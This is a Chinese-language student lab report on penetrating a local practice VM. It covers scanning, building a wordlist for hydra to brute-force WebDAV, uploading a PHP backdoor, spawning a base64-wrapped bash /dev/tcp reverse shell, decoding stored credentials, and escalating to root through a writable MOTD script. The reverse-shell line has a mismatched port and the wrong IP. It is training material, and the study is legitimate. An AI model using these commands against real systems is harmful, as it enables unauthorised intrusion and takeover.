一、实验目的
1、掌握远程控制的基本原理和技术实现
2、掌握使用MSFVENOM生成被控端的方法和远程控制工具MSF的使用;
3、掌握权限提升的一般方法。
二、实验任务
1、对目标靶机进行信息收集并分析研究可利用的漏洞;
2、利用MSFVENOM工具生成被控端;
3、上传文件反弹shell并利用 Metaspolit 对目标靶机进行渗透控制;
4、提升目标靶机的操作权限。
三、实验环境
1、靶机地址:192.168.137.131
2、攻击机地址:192.168.137.18
四、实验过程和实验结果
1.主机发现/端口扫描
(1)扫出靶机ip地址
命令:sudo arp-scan -l
- 用nmap进行端口和服务扫描
命令:nmap -sV -sC -p- 192.168.137.131
扫出了22端口和80端口,访问80端口
无可用信息
2.信息收集
dirsearch进行目录扫描
命令:dirsearch --url http://192.168.137.131
经过目录扫描,发现webdav的路径进行访问,发现需要登录
- 密码字典定制
用kali自带的字典生成工具cewl生成一个针对这个网站专属的字典进行测试
命令:cewl http://192.168.137.131 >words.dic
- hydra 进行爆破
命令:hydra -L words.dic -P words.dic http-get://192.168.137.131/webdav
成功登录
- 漏洞利用
利用cadaver登录webdav上传shell文件
命令:cadaver http://192.168.137.131/webdav
Put /usr/share/webshells/php/qsd-php-backdoor.php
网页访问文件目录,反弹shell
尝试用/bin/bash/进行一个交互式的bash shell 连接,监听端口为4444,并进行base64加密
命令:echo ‘/bin/bash -i >& /dev/tcp/192.168.137.131/444 0>&1’|base64
将base64加密后构建的一个交互式的bash shell连接语句在网站后门上输出,同时打开本地监听
命令:nc -lnvp 4444
已获得www-date用户的访问权限,进行下一步操作
切换到根目录-->系统信息收集-->linux系统重要目录文件内容查找
查看账户信息文件,权限过低无法查看/tec/shadow文件
查看靶机各个用户的家目录
在inferno用户的目录下发现user.txt文件,查看,得到一串MD5加密字符串
在/mnt目录下存在hell.sh,还存在creds.txt
将creds.txt文件里面的内容解密,得到webdav登录的账密
查看靶机的/mnt/hell.sh文件,发现hell加密字符串,是brainfuck语言
解密得到:chitragupt
推测该字符是某服务的账号密码,又知道inferno用户下有flag提示,应该是inferno用户的账密,又靶机开放22-ssh服务,那这应该是ssh服务的账密
尝试ssh账密登录
成功以inferno用户身份登录ssh
6.权限提升
查看00-header文件权限
发现此文件对各个用户的权限均为可读可写可执行
将提权命令写入该文件
重新登录inferno账户,即可触发脚本
登陆之后根据写入的密码,切换登录到root用户
切换到各个目录查看是否有敏感文件,在家目录下发现root.txt,查看内容